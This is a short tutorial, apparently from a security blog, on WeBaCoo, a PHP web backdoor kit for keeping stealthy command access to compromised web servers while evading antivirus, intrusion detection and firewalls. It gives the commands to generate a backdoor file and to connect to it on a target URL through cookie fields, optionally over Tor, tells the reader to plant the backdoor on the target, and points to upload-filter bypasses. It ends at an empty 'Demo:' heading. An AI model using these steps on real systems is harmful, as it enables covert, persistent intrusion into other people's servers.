Introduce

WeBaCoo – Web Backdoor Cookie Script-Kit. aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.

The project is available at: https://github.com/anestisb/WeBaCoo

Usage:

Step 1: Create a backdoor

webacoo -g -f 1 -o security-training-share.php

Description of options:
-g – specifies the creation of a backdoor
-f – selects a system function to execute commands:
system (default)
shell_exec
exec
passthru
popen
-o – specifies the name of the generated file

Step 2: Using a backdoor

Please throws backdoor on the target machine, to which we have access to and work with the command line interface through webacoo. To bypass blacklist, whitehlist, and more for uploading backdoor, please visit here.

webacoo -t -u http://url/bacdoor.php -c M_cookie -p PROXY

Description of options:

-t – establishes a remote connection
-u – address a backdoor
-c – specifies the variable of the cookie
-p – uses a connection via proxy, including the ability to use available tor network.

We get the shell on the target machine with the help of our backdoor.php:

Demo: